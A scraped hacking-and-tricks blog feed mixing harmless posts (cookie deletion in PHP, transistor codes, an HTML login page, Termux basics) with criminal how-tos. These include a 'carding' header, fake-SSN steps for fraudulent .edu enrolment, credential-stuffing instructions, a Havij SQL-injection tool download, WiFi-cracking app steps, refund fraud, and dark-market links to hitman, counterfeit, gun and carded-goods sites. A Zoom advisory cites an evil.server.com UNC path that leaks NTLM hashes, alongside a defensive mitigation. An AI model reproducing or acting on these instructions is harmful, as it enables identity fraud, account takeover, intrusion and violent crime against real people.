-Following to the above example, once a browser has created a Cookie any request can be made by the browser for the same Domain and cookies that belongs to this domain will be sent back as part of the request .





*Destroying a Cookie*

-To delete a cookie, you must issue it again and set a date in the past.
-It is important for all parameters in your new Setcookie call except the timestamp to be identical to the parameters when the cookie was first issued; otherwise,  the deletion will fail.
-Therefore to delete the Cookie created earlier, you would use the following :
*Setcookie* _("username","Skarter", time() -2592000,"/);_
-As long as the time given is in the past, the Cookie should be deleted.
-However, I have used a time of 2592000 seconds (One Month) in the past in case the client computer's date and time are not correctly set.





Follow us for more...

What is the meaning of alphabet on transistors ?


Normally there is two alphabet coading and after that there is some number on transistors  so let see what the alphabet  says .
Firat alphabet 

If A-one or more junction device and 0.6 to 1.0ev band gape deviec like zermenium.

If B-one or more junction device and 1.0 to 1.3ev band gape deviec silicon.

If C-one or more junction device and more then 1.3ev band gape deviec like gelium and arcenide.

if D-one or more junction device and less then 0.6ev band gape deviec like indinium antimonamide

If R- without any junction and used with photo conductive marerials

Now with second latter.
A- detecrion diode,hi-speed diode,mixture diode.
B- caaeiable capacitance diode
C-transistor for AF
D-power transistor for AF
E- tunnel diode
F-transistor for RF
G-dcmiller multiple  devices
H-field probe
K-hole generator (used in open magnetic circuit)
L- power transistor  for RF
M-hole generator (used in close magnetic circuit)
P-radiation sensitive device
Q-radiation generating device
R-Electrically triggered 'control' with breakdown characteristic and self switching device
S-transistor for switching application
T-Electrically triggered 'control' with breakdown characteristic and self switching decide  controlled with light
U-power transistor  for switching application
X-multiplier diode like varactor  or step recovery diode
Y-rectifier diode ,booster diode
Z-voltage refrance of voltage regulator diode

For digit
If there is three digit so it means it is cosumer goods ,if there is first 2 latter and then 2 digit it mean it is industrial  applications.




Follow us for more...

(Carding) Important links to generate CC

Pentest and CTF Labs to improve your hacking skills.


----------------

HackTheBox
https://www.hackthebox.eu

Vulnhub
https://www.vulnhub.com

Practical Pentest Labs
https://practicalpentestlabs.com

Labs Wizard Security
https://labs.wizard-security.net

Pentestlab
https://pentesterlab.com/

Hackthis
https://www.hackthis.co.uk

Shellter
https://shellterlabs.com/pt/

Root-Me
https://www.root-me.org/

Zenk-Security
https://www.zenk-security.com/epreuves.php

W3Challs
https://w3challs.com/

NewbieContest
https://www.newbiecontest.org/

The Cryptopals Crypto Challenges
https://cryptopals.com/

Penetration Testing Practice Labs
http://www.amanhardikar.com/mindmaps/Practice.html

alert(1) to win
https://alf.nu/alert1

Hacksplaining
https://www.hacksplaining.com/exercises

Hacker101
https://ctf.hacker101.com

Academy Hackaflag
https://academy.hackaflag.com.br/

PentestIT LAB
https://lab.pentestit.ru

Hacker Security
https://capturetheflag.com.br/

PicoCTF
https://picoctf.com

Explotation Education
https://exploit.education/

Root in Jail
http://ctf.rootinjail.com

CMD Challenge
https://cmdchallenge.com

Try Hack Me
https://tryhackme.com/

Hacking-Lab
https://www.hacking-lab.com/index.html

PWNABLE
https://pwnable.kr/play.php

WHO4REYOU
https://34.73.111.210

Google CTF
https://capturetheflag.withgoogle.com/

ImmersiveLabs
https://immersivelabs.com/

Attack-Defense
https://attackdefense.com/

OverTheWire
http://overthewire.org

SANS Challenger
https://www.holidayhackchallenge.com/

SmashTheStack
http://smashthestack.org/wargames.html








Enjoy  ! Follow us for more... 

How to create login page in html ?

Hi Friendz

Today I will create a html login page

Copy this code and paste it to notepad, than go to

File>Save As

Give it a name that ends with .html extantion and save it

How open this html file.

And you get a login screen


<html >
<head>
<title>XLAR8</title>

<style>
/*css*/
body {
background-color:#172035;
}

#log_in{
border:solid aqua;
border-radius:10px;
text-align:center;
margin-top:100px;
margin-left:100px;
width:50%;
height:250px;

}
#log_in ,h1{
color:white;
}
#log_in input{
border-style:hidden hidden solid hidden;
background-color:#172035;
border-color:aqua;
color:white;
margin-top:10px;
width:15%;
-webkit-transition:width 2s;
transition: width 2s;
}
#log_in input:hover{
width:85%;
}
#log_in button{
border:solid black;
color:white;
background-color:black;
border-radius:10px;
margin-top:15px;
-webkit-transition:background-color 2s;
transition:background-color 2s;

}
#log_in button:hover{
background-color:blue;
}

</style>
</head>
<body>

<div id="log_in">
<h2>log in :</h2>
<br />
<input type="email" placeholder="example@e-mail.com"/>
<br />
<input type="password" placeholder="password"/>
<br />
<input type="number" placeholder="number"/>
<br />
<button>log in </button>

</div>

</font>

<font size=5>



<a href="xlar8.blogspot.com/ ">
XLAR8 : All </a><br>

<a href="https://chat.whatsapp.com/H0Gsgryv2AE2Yrsn8eof02">join our whatsapp group</a><br>

<a href="https://xlar8.blogspot.com/">Wabsite </a><br><br>

</font>


<marquee><h1>Like And Subcribe Us  </h1></marqee>


</body>
</html>






Enjoy! Follow us for more... 

VPS Websites With Trials

​​🔰🔰

https://developer.rackspace.com/ [600$ for 12 Months]


https://www.runabove.com/ [1 Week Trial]


https://www.vultr.com/ [50$ for 2 Months]


http://cloudsigma.com/ [7 days no CC]


https://www.ctl.io/free-trial/ [2500$ or 1 Month]


https://www.ihor.ru/ [3 days No CC]


http://www.neuprime.com/l_vds3.php [10 days (Otp Required)





Follow us for more...

HTTP PROXY !





🇨🇦 - Canada)142.93.130.169:8118
(🇺🇸 - United States)64.227.37.47:8080
(🇺🇸 - United States)64.227.1.188:8080
(🇮🇩 - Indonesia)182.253.173.86:8080
(🇩🇪 - Germany)54.37.76.57:8080
(🇨🇳 - China)51.83.231.1:8118
(🇹🇭 - Thailand)58.8.143.206:8080
(🇹🇭 - Thailand)124.122.255.22:8080
(🇷🇴 - Romania)89.42.133.58:8080
(🇬🇧 - United Kingdom)51.68.212.227:9999
(🇩🇪 - Germany)144.91.71.141:8080
(🇫🇷 - France)163.172.154.72:8811
(🇸🇬 - Singapore)128.199.76.135:44321
(🇸🇬 - Singapore)128.199.185.62:44321
(🇸🇬 - Singapore)128.199.79.109:44321
(🇺🇸 - United States)40.118.203.136:8888
(🇧🇷 - Brazil)54.233.130.197:8080
(🇸🇬 - Singapore)128.199.184.141:8080
(🇩🇪 - Germany)194.15.36.20:8888
(🇦🇷 - Argentina)200.73.128.198:8080
(🇫🇷 - France)51.158.114.177:8811
(🇸🇬 - Singapore)128.199.180.47:44321
(🇸🇬 - Singapore)128.199.184.93:8080
(🇫🇷 - France)163.172.190.160:8811
(🇸🇬 - Singapore)128.199.172.202:8080
(🇸🇬 - Singapore)206.189.37.101:44321
(🇸🇬 - Singapore)128.199.71.160:44321
(🇸🇬 - Singapore)128.199.72.53:44321
(🇸🇬 - Singapore)128.199.162.203:44321
(🇻🇳 - Vietnam)42.115.67.46:8080
(🇸🇬 - Singapore)128.199.177.120:8080
(🇺🇸 - United States)157.245.253.81:8080
(🇦🇷 - Argentina)200.89.174.64:8080
(🇹🇭 - Thailand)101.108.50.130:8080
(🇰🇪 - Kenya)41.60.233.34:8080
(🇺🇸 - United States)64.227.14.209:8080
(🇷🇺 - Russia)62.32.90.99:8080
(🇸🇬 - Singapore)206.189.154.176:8080
(🇮🇩 - Indonesia)36.82.236.82:8080
(🇹🇭 - Thailand)180.183.59.70:8080
(🇺🇸 - United States)142.93.114.42:8080
(🇱🇺 - Luxembourg)104.244.77.254:8080
(🇮🇷 - Iran)37.235.30.203:8080
(🇺🇸 - United States)198.98.58.178:8080
(🇸🇬 - Singapore)94.237.79.177:8080
(🇦🇷 - Argentina)200.89.178.230:8080
(🇹🇭 - Thailand)14.207.59.57:8080
(🇱🇹 - Lithuania)31.193.196.3:3128
(🇺🇸 - United States)198.98.54.241:8080
(🇲🇽 - Mexico)200.95.239.10:3128
(🇺🇸 - United States)198.98.56.71:8080
(🇮🇹 - Italy)94.177.160.8:7777
(🇺🇸 - United States)52.175.200.153:3128
(🇩🇪 - Germany)46.4.163.222:3128
(🇺🇸 - United States)144.202.57.181:3128
(🇸🇬 - Singapore)178.128.24.117:8080
(🇺🇸 - United States)64.227.41.195:8080
(🇻🇳 - Vietnam)103.89.84.150:3128
(🇺🇸 - United States)128.1.210.2:3128
(🇯🇴 - Jordan)91.134.180.0:3128
(🇺🇸 - United States)64.227.17.107:3128
(🇵🇰 - Pakistan)103.104.212.10:8080
(🇮🇪 - Ireland)52.214.166.188:3128
(🇦🇷 - Argentina)200.89.174.158:3128
(🇺🇸 - United States)165.22.222.119:3128
(🇭🇰 - Hong Kong SAR China)119.237.73.133:3128
(🇦🇷 - Argentina)200.89.178.209:3128
(🇺🇸 - United States)156.96.118.58:3128
(🇿🇦 - South Africa)102.182.83.200:3128
(🇭🇰 - Hong Kong SAR China)52.175.31.65:3128
(🇨🇦 - Canada)144.217.182.44:3128
(🇺🇸 - United States)38.91.107.117:3128
(🇹🇭 - Thailand)14.207.199.73:8080
(🇩🇪 - Germany)93.104.210.181:3128
(🇭🇰 - Hong Kong SAR China)23.98.43.33:3128
(🇬🇧 - United Kingdom)185.122.57.238:3128
(🇫🇷 - France)149.202.86.167:3128
(🇲🇽 - Mexico)148.217.94.54:3128
(🇩🇪 - Germany)62.138.8.86:3128
(🇫🇷 - France)51.91.212.159:3128
(🇦🇷 - Argentina)200.73.129.104:3128
(🇮🇩 - Indonesia)111.95.23.108:3128
(🇮🇪 - Ireland)54.229.222.255:3128
(🇳🇱 - Netherlands)145.14.157.37:3128
(🇮🇹 - Italy)80.211.234.42:3128
(🇸🇬 - Singapore)128.199.172.214:8080
(🇸🇬 - Singapore)137.74.99.249:3128
(🇮🇷 - Iran)213.233.177.165:3128
(🇫🇷 - France)62.210.170.222:3128
(🇮🇳 - India)14.139.189.213:3128
(🇨🇱 - Chile)200.54.234.126:3128
(🇺🇸 - United States)52.151.53.194:3128
(🇺🇸 - United States)54.173.39.217:3128
(🇮🇳 - India)14.140.131.82:3128
(🇸🇬 - Singapore)128.199.121.141:3128
(🇨🇿 - Czechia)213.175.42.220:3128
(🇬🇧 - United Kingdom)139.162.210.236:3128
(🇫🇷 - France)164.132.173.129:3128
(🇯🇵 - Japan)52.140.242.103:3128
(🇹🇭 - Thailand)118.174.211.220:11
(🇮🇪 - Ireland)34.253.177.131:3128
(🇮🇪 - Ireland)34.246.178.161:3128
(🇦🇷 - Argentina)200.50.161.228:3128
(🇮🇹 - Italy)80.211.37.70:3128
(🇱🇺 - Luxembourg)104.244.75.26:8080
(🇪🇸 - Spain)2.138.151.178:3128
(🇮🇹 - Italy)80.211.234.42:8080





Follow us for more...

EDU MAIL METHOD (GET YOUR EDU MAIL FREE)


1) Open your web-browser and navigate to http://eims.maricopa.edu/maw/maw.html .

2) On the new page open check "I am a new student and have never attended any of the Maricopa Community Colleges or Skill Centers."
   
3) Complete the captcha.
 
4) Open a new Tab and go to http://www.fakenamegenerator.com/
 
5) Select male or female(up to you), select USA and press generate.
   
6) You will see a SSN Number similar to "427-70-xxxx" or whatever. Just remove the dashes and replace XXXX with numbers and paste it to the Maricopa website.
   
7) You can set date of birth, first name, and last name to whatever (or just use the data provided from fakenamegenerator and press next. I suggest selecting like 1993 to make it seem legit, but that's up to you.
 
8) Use the gender, phone, address 1, city, state, and postal code, as shown on the
generated page.
 
9) Click next then make ur security questions Then save the info u get from the next page

10) Go to https://my.maricopa.edu/

11) then click Student center

12) login (IF u cant login yet wait a few mins)

13) Once in go all the way down to addmison Click apply for addmison

14) Select Rio Salado College and under that select no credit

15) once u get past that part just put fake info then click next then wait for it to load

16) Then look for change term button Select spirng 2016 then click continue

17) Then look for enter class nbr and eneter 38716 in the box then click enter

18) then a proceed to step 2 of 3  button will pop up click it

19) Click finish enrolling then you are done

20) Wait 10-20 mins after then use the info u got before to login here http://mail.google.com/a/maricopa.edu MEID is the thing u get on step 9








Enjoy ! Follow us for more...

Havij : Pro ( Combo Dumping Tool ) 🔥

🔥 

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands.


Download : https://hostr.co/JAZl9rXeCjmw





Enjoy ! Follow us for more...

HOW TO GET SPOTIFY PREMIUM FOR FREE ?


: STEPS
1. Buy spotify premium
2. Wait 2-3 days! In that time add the music to ur playlist.
3. Turn on Offline mode in settings.
4. Contact Support.
5. Say – My headphones broke so there is no need to use spotify anymore, can I get my money back?
6. 99% they will say OK and will refund ur money.
7. Enjoy 30 days free premium





Enjoy ! Follow us for more...

How Proxies Work ?

[:

As you know, whenever you visit (or hack) a website or server over the Internet, your unique Interpret Protocol (IP) address travels with you. It would then be very easy to trace the source of an attack by simply tracing the source IP address.

Hackers, though, often use proxies to hide or obscure their IP address. In this way, they send their traffic to an intermediary proxy, who then sends the traffic on to the destination, replacing the source IP address with its own. In this way, the malicious traffic appears to be coming from the proxy and not the original sender.
Before I start, I want to point out that there are multiple types of proxies. One of the more popular, anonymous proxies is Tor. Although Tor is effective in anonymizing your traffic from Google and other commercial tracking, it is not effective in anonymizing your traffic from law enforcement, especially the NSA.







Follow us for more...

perform termux as speak engine !

🔰with this script you can🔰

first you need to install these apps

1] Termux App

2] Termux API App

Now open Termux and follow these steps to install speak-Engine

👇installation :

$ apt update

$ apt upgrade

$ apt install git

$ apt install python2

$ git clone https://github.com/TechnicalMujeeb/Termux-speak

$ cd Termux-speak

$ chmod +x *

$ sh install.sh

usage :

python2 t-speak.py

select option 2

Enter Your Text to speak.

Enter pitch number

Enter rate number

Then it will speak that texts..

that's it






Enjoy! Follow us for more...

HOW TO CRACK ACCOUNTS - BARE BASICS | FOR NOOBS

🔥 **** 🔥

This is how to crack accounts for people who are literally noobs, meaning that you have no idea what cracking is and how it works. This would've been something I wished I had when I started out cracking.

Basically what cracking is, it's taking combolists, and running them through a program to check if that info is valid. You usually want to use proxies so your IP doesn't get banned Combolists: It's a txt file full of emails and passwords, in the format email:pass Proxies: The "gateway" between you and the internet. Basically use this so your IP doesn't get banned. Checkers: These are the checkers you use to check the combolist.

Steps of cracking:

1. Get a combolist

2. Get a checker for whatever account you want to crack

3. Get proxies

4. Load combolists and proxies into the checker

5. Press start Your checker should now start checking each email from different proxies to see if it's a valide combo for that service You use proxies since the company, let's say Disney again, will ban your IP for logging in too many times. The proxy makes it so it seems like your logging in from different locations each time. Beware cracking is ILLEGAL. But the risk is very low. Cracking is unethical. Anyway, have fun!

Enjoy! Follow us for more... 

Vulnerability in Zoom client could reveal Windows login credentials to attackers !



1) Recently, the Zoom client for Windows has revealed a security vulnerability vulnerable to NUC path injection attacks. As an audio and video conference application, Zoom also allows users to communicate with each other by sending text messages on the chat interface. However, foreign media Bleeping Computer pointed out that an attacker could use the vulnerability of the chat module to steal the Windows login credentials of the user who clicked the relevant link.

2) When sending a chat message, all sent URLs will be converted so that other members of the group can click and then open the webpage in the default browser.

> However, security researcher @undercodeTesting  found that the Zoom client turned the Windows network UNC path into a clickable link in the chat message.

> both the regular URL and the NUC path (\\ evil.server.com \ images \ cat.jpg) are converted into clickable links in the chat message

3) f the user clicks the UNC path link, Windows will attempt to connect to the remote site using the SMB file sharing protocol to open the cat.jpg file in the remote path.

By default, Windows will send the user's login name and NTLM password hash, but a less experienced attacker can use a free tool like Hashcat to do the reverse.

4) Security researcher Matthew Hickey (@ HackerFantastic) found that it can be successfully injected in Zoom and can be quickly cracked with the help of current civilian GPUs and CPUs.

In addition to stealing Windows login credentials, Hickey also revealed to Bleeping Computer that by clicking on the link, UNC injection is also suitable for starting programs on the local computer (such as the CMD command prompt).

5) Fortunately, Windows will prompt you whether to allow the program to run before it is executed. To plug this vulnerability, Zoom must prevent the UNC path translation feature of the Windows client (block some clickable hyperlinks).

It is reported that Hickey has sent a notice to Zoom official on Twitter about the security breach, but it is not clear what action the company has taken.

6) Security-conscious customers can restrict NTLM communication to remote servers through Group Policy before the official patch release (refer to the following operations):

Computer Configuration-> Windows Settings-> Security Settings-> Local Policies-> Security Options-> Network Security: Restrict NTLM-> NTLM traffic to remote servers (then all configured to deny).

7)Note that if you configure the above Group Policy on a computer that has joined the relevant domain, you may encounter problems when trying to access the share.

For Windows 10 Home users who do not have access to Group Policy settings, you can also use the Registry Editor to complete the relevant restrictions (dword is set to 2):

[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa \ MSV1_0] "RestrictSendingNTLMTraffic" = dword: 00000002

8) To create this key correctly, Windows users remember to launch Registry Editor as an administrator.

If in the future it is necessary to restore the default Windows behavior of sending NTLM credentials, simply delete the corresponding RestrictSendingNTLMTraffic key.

WRITTEN BY UNDERCODE






Enjoy!  Follow us for more... 

How to track traffic from a smartphone using Wireshark ?



A) Scan DNS & HTTP packets
By eliminating traffic protection, Wireshark can decrypt it and tell which devices are currently in the Wi-Fi network.

1)  DNS queries
To see the packages we are interested in, let's start with DNS queries. With their help, applications verify that the IP addresses to which they should connect have not changed. They are directed to domain names, which usually contain the name of the application. From this, you can understand which applications are running on the smartphone.

2) To see application requests, we will use two capture filters, dns and http. This allows you to see the most obvious traces of applications on a Wi-Fi network. First, type dns in the filter and press enter. If this does not work, try several times in a row to switch in real time between the password and the PSK. Perhaps after that everything will work.

>Using Signal is a good idea, but it’s even better to use a VPN. Why? Just launching the Signal application creates the following traces, allowing you to understand that a person is chatting with someone in an encrypted program.

B )  HTTP packets
Next, we use the http filter to look at insecure web requests. Capture filters contain information like useragent, from which you can learn about the type of connecting device. We click on the packages and open the tab “Hypertext Transfer Protocol”.

1) In this example, you can see insecure HTTP requests to the chat server. What is it? Studying the package and domain name gives the answer that this is a WeChat application. It is installed on this smartphone and communication is not fully encrypted.

 2) If you want to see all the decrypted data, you can click on the menu tab called “Statistics” and see the allowed addresses. This will show all the decrypted domains during the capture. This should be a long list of services to which the device connects through applications.

3) Wireshark makes it harder to trust Wi-Fi networks
This kind of monitoring seems intrusive, but you need to remember that your Internet provider saves the same information and can sell it or transfer it to law enforcement agencies upon request. If you want to protect yourself from such provider actions, you can use VPN services to hide local traffic through strong encryption. If you need to hide especially during certain actions, it is advisable to use mobile traffic instead of Wi-Fi.

written by undercode






Enjoy!  Follow us for more... 

TOP 15 FREE HOSTING PROVIDER !

🔰IN 2020🔰

1:- 000webhost.com
2:- Freehostia.com
3:- Jimdo.com
4:- FreeHosting.com
5:- xtreemhost.com
6:- Zymic.com
7:- Byethost.com
8:- 110MB.com
9:- AwardSpace.com
10:- 1FreeHosting.com
11:- FreeHostingEU.com
12:- Uhostfull.com
13:- 50Webs.com
14:- ZettaHost.com
15:- x10hosting.com







Follow us for more... 

WATCH ANY MOVIE FOR FREE! 100% SAFE!

🔰 🔰

Step 1: Choose a Movie. For demo, I chose Thor.

Step 2: Go to google search

Step 3: Put this in the search bar - [Name Of Movie You Want] 1080p mkv site:drive.google.com
Example: The Avengers 1080p mkv site:drive.google.com

Step 4: Click on any of the links. You will be directed to Google Drive and you can watch the full movie.

I personally do this instead of torrenting or 123movies because it's a better experience. No ads. Not illegal to watch a video on Google Drive.




Enjoy! Follow us for more...

Some darknet markets link

For now

To browse .onion Deep Web links, install Tor Browser from http://torproject.org/

Hidden Service lists and search engines

http://3g2upl4pq6kufc4m.onion/ – DuckDuckGo Search Engine

http://xmh57jrzrnw6insl.onion/ – TORCH – Tor Search Engine

http://zqktlwi4fecvo6ri.onion/wiki/index.php/Main_Page – Uncensored Hidden Wiki

http://32rfckwuorlf4dlv.onion/ – Onion URL Repository

http://e266al32vpuorbyg.onion/bookmarks.php – Dark Nexus

http://5plvrsgydwy2sgce.onion/ – Seeks Search

http://2vlqpcqpjlhmd5r2.onion/ – Gateway to Freenet

http://nlmymchrmnlmbnii.onion/ – Is It Up?

http://kpynyvym6xqi7wz2.onion/links.html – ParaZite

http://wiki5kauuihowqi5.onion/ – Onion Wiki – 650+ working 05.2017 deep web links

http://kpvz7ki2v5agwt35.onion – The Hidden Wiki

http://idnxcnkne4qt76tg.onion/ – Tor Project: Anonymity Online

http://torlinkbgs6aabns.onion/ – TorLinks

http://jh32yv5zgayyyts3.onion/ – Hidden Wiki .Onion Urls

http://wikitjerrta4qgz4.onion/ – Hidden Wiki – Tor Wiki

http://xdagknwjc7aaytzh.onion/ – Anonet Webproxy

http://3fyb44wdhnd2ghhl.onion/wiki/index.php?title=Main_Page – All You’re Wiki – clone of the clean hidden wiki that went down with freedom hosting

http://3fyb44wdhnd2ghhl.onion/ – All You’re Base

http://j6im4v42ur6dpic3.onion/ – TorProject Archive

http://p3igkncehackjtib.onion/ – TorProject Media

http://kbhpodhnfxl3clb4.onion – Tor Search

http://cipollatnumrrahd.onion/ – Cipolla 2.0 (Italian)

http://dppmfxaacucguzpc.onion/ – TorDir – One of the oldest link lists on Tor

Marketplace Financial

http://torbrokerge7zxgq.onion/ – TorBroker – Trade securities anonymously with bitcoin, currently supports nearly 1000 stocks and ETFs

http://fogcore5n3ov3tui.onion/ – Bitcoin Fog – Bitcoin Laundry

http://2vx63nyktk4kxbxb.onion/ – AUTOMATED PAYPAL AND CREDIT CARD STORE

http://samsgdtwz6hvjyu4.onion – Safe, Anonymous, Fast, Easy escrow service.

http://easycoinsayj7p5l.onion/ – EasyCoin – Bitcoin Wallet with free Bitcoin Mixer

http://jzn5w5pac26sqef4.onion/ – WeBuyBitcoins – Sell your Bitcoins for Cash (USD), ACH, WU/MG, LR, PayPal and more

http://ow24et3tetp6tvmk.onion/ – OnionWallet – Anonymous Bitcoin Wallet and Bitcoin Laundry

http://qc7ilonwpv77qibm.onion/ – Western Union Exploit

http://3dbr5t4pygahedms.onion/ – ccPal Store

http://y3fpieiezy2sin4a.onion/ – HQER – High Quality Euro Replicas

http://qkj4drtgvpm7eecl.onion/ – Counterfeit USD

http://nr6juudpp4as4gjg.onion/pptobtc.html – PayPal to BitCoins

http://nr6juudpp4as4gjg.onion/doublecoins.html – Double Your BitCoins

http://lw4ipk5choakk5ze.onion/raw/4588/ – High Quality Tutorials

Marketplace Commercial Services

http://6w6vcynl6dumn67c.onion/ – Tor Market Board – Anonymous Marketplace Forums

http://wvk32thojln4gpp4.onion/ – Project Evil

http://5mvm7cg6bgklfjtp.onion/ – Discounted electronics goods

http://lw4ipk5choakk5ze.onion/raw/evbLewgkDSVkifzv8zAo/ – Unfriendlysolution – Legit hitman service

http://nr6juudpp4as4gjg.onion/torgirls.html – Tor Girls

http://tuu66yxvrnn3of7l.onion/ – UK Guns and Ammo

http://nr6juudpp4as4gjg.onion/torguns.htm – Used Tor Guns

http://ucx7bkbi2dtia36r.onion/ – Amazon Business

http://nr6juudpp4as4gjg.onion/tor.html – Tor Technology

http://hbetshipq5yhhrsd.onion/ – Hidden BetCoin

http://cstoreav7i44h2lr.onion/ – CStore Carded Store

http://tfwdi3izigxllure.onion/ – Apples 4 Bitcoin

http://e2qizoerj4d6ldif.onion/ – Carded Store

http://jvrnuue4bvbftiby.onion/ – Data-Bay

http://bgkitnugq5ef2cpi.onion/ – Hackintosh

http://vlp4uw5ui22ljlg7.onion/ – EuroArms

http://b4vqxw2j36wf2bqa.onion/ – Advantage Products

http://ybp4oezfhk24hxmb.onion/ – Hitman Network

http://mts7hqqqeogujc5e.onion/ – Marianic Technology Services

http://mobil7rab6nuf7vx.onion/ – Mobile Store

http://54flq67kqr5wvjqf.onion/ – MSR Shop

http://yth5q7zdmqlycbcz.onion/ – Old Man Fixer’s Fixing Services

http://matrixtxri745dfw.onion/neo/uploads/MATRIXtxri745dfwONION_130827231336IPA_pc.png – PC Shop

http://storegsq3o5mfxiz.onion/ – Samsung StorE





Enjoy! Follow us for more....

What's the difference between hacking and cracking?

​🔥
The difference is that a hacker is someone that uses their extensive knowledge of computer logic and code for malicious purposes, while a cracker - looks for back doors in programs, and exploits those back doors. Cracking is generally less harmful than hacking. Hackers are usually involved with web related hacking, like MySQL interception, or phishing, other forms of hacking would include things like brute force, or password lifting.




Follow us for more...

Some Basic commands for Termux and its use.



This section is useful for basic commands users.

*BasicCommands*

COMMANDS FOR TERMUX

(pkg help         
to see the options provided by the TERMUX pkg package manager.)

(pkg search
to search packages by name.)

(pkg install
to install packages.)

(uninstall pkg
 to delete packages.)

(pkg reinstall
to reinstall packages)

(pkg show
to display detailed information about packages.)

(pkg list-installed
to display a list of packages installed in your termux.)

(pkg files
to see the location of installed files packages)

(pkg list-all
to display all packages provided in the repository.)

(pkg upgrade
to update and upgrade packages installed in your termux)

(clear
This basic command is used to clean the console window)

{pwd
pwd (print working directory), used to see the position of the current directory location.}

(ls
used to view / list files and directories. use ls -la to view detailed information of files and folders)

(CD
Used to navigate / move to another directory that we want, use cd ... to return to the directory level, use cd ~ to go to the home directory)

(cp
Used to copy / copy files and folders.
cp -avr / folder-origin / destination folder to copy the folder and its contents)

(mv
Used To move files and folders or can be used to rename if the file / folder has the same origin and destination)

(rm
Used to delete files.
rm -rf Folder name to delete the folder and its contents.)

(rmdir
Used to delete an empty Folder.)

(rmdir --ignore-fail-on-non-empty folder name to delete non-empty folders)

(chmod
Used to change File / folder permissions / privilage.)

(chmod + xFolder name to change permisin to 775 or rwx – x – x)






Enjoy! Follow us for more...

Mobile Threats and its catagories !

**

Emerging mobile phone technology, especially Smartphones has raised the
focus of attacker over mobile devices. As Smartphones are popularly used all
over the world, it has shifted the focus of attackers to steal business and
personal information through mobile devices. The most common threat to
mobile devices are:
Data leakage
Unsecured Wi-Fi
Network Spoofing
Phishing Attacks
Spyware
Broken Cryptography
Improper Session Handling






Enjoy! Follow us for more...

Information Security Threat Categories

**
_______________________
Information Security Threats categories are as follows:
Network Threats
The primary components of network infrastructure are routers, switches, and
firewalls. These devices not only perform routing and other network
operations, but they also control and protect the running applications, servers,
and devices from attacks and intrusions. The poorly configured device offers
intruder to exploit. Common vulnerabilities on the network include using
default installation settings, open access controls, Weak encryption &
Passwords, and devices lacking the latest security patches. Top network level
threats include:
Information gathering
Sniffing & Eavesdropping
Spoofing
Session hijacking
Man-in-the-Middle Attack
DNS & ARP Poisoning
Password-based Attacks
Denial-of-Services Attacks
Compromised Key Attacks
Firewall & IDS Attacks





Enjoy! Follow us for more...

Hack Wifi On Android Using AndroDumper App Apk



Well, Another wifi hacking app without even rooting Android is here. AndroDumper App is the best android application which helps you to hack WiFi passwords on the non-rooted Android device. For use, Andro Dumper android application follows below  Just follow the below steps to execute this process:

Step 1: First you need to download and install ‘AndroDumper App’.

Step 2: After successfully Installation, Open that app on your Androidoid device.

Step 3: Now press the refresh button at top of the screen in the app.

Step 4: Select try connects option from the pop-up and this app finds wifi password within a few seconds.

Well, you can try this app as well if the above apps are not working properly. The very basic thing you need to keep in your mind is to proceed with this hack when the WiFi security is low.

Also Read: Fix WiFi Connected But No Internet Access?

WiFi Routers That Save your Online Presence 

Hack Wifi Password Android

#1. NETGEAR Orbi Ultra – HackersProof

We are suggesting you go with this WiFi Router if you want to be safe on the internet. However, This router has some special features that make it hackproof and save your data from being hacked online. The best thing about this router is NETGEAR Armor- Built-in anti-virus and data theft protection for all of your smartphones and computers. Protects your connected home from internet threats. Included trial covers unlimited devices. You can buy it from here

#2. ASUS Dual-Band Gigabit WiFi Gaming Router – It always works?

Asus is one of the top electronics brands around there. and when it comes for WiFi Security. I think none other than Asus after Netgear makes it possible that will provide you ultra-high shield security to your network. Hackers can’t break this much high security. I recommend you to go with this WiFi Router it will help you to save you from being breached. Buy Here

Method #4: Hack WiFi On Non-Rooted Android Using Bcmon Android App

Bcmon is another android wifi hacking app and it is used to enable monitor mode on your rooted android device.  Bcmon app is required the rooted android device. This android app required rever android app is used to attack WPS enabled routers and find the WPA key. Bcmon App required approx 2-3 hours to crack WPS enable wifi network. This is a working method, all you need to follow

Step 1: First you need to download and install Bcmon App on your Android device.

Step 2: And install firmware tools and click on enable monitor mode and then download rever and install on your android device.

Step 3: After that check the box of an automatically advanced setting option. Rever is used to check available access point of WPS enables wifi networks.

Step 4: After scan chooses the WPS to enable network and click on the start attack button.

Must Try:

*. Spotify Premium Apk Free Download | Latest Offline MOD

*. Best Nintendo 3DS Emulators

*. Download Snapchat++

Method #5: Crack WPS Security Using WPS Connect Apk Working

(Updated) Yet! Followed by above four methods we got hell lots of messages regarding WPS Router WiFi Access. So yes! we are here with you. I know you all guys probably heard about this Android App but Trust me nobody had ever taught you that how could this app works? Wait! We will be going to add a brief video tutorial over it very soon!

These above are the all about wifi hacking on using Android, you can try any of them freely. This Wifi Hacking (WPS/WPS2/WPA) is always working as I tested it before.
By ONETH.M.M CERTIFIED ETHICAL HACKER.





Enjoy! Follow us for more...

HOW​ ​TO​ ​ORDER​ ​PHONES​ ​AND​ ​ACCESSORIES​ ​THROUGH​ ​A​ ​CLIENTS​ ​PHONE​ ​CARRIER (line)​ ​PLAN.

This summary is not available. Please click here to view the post.

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...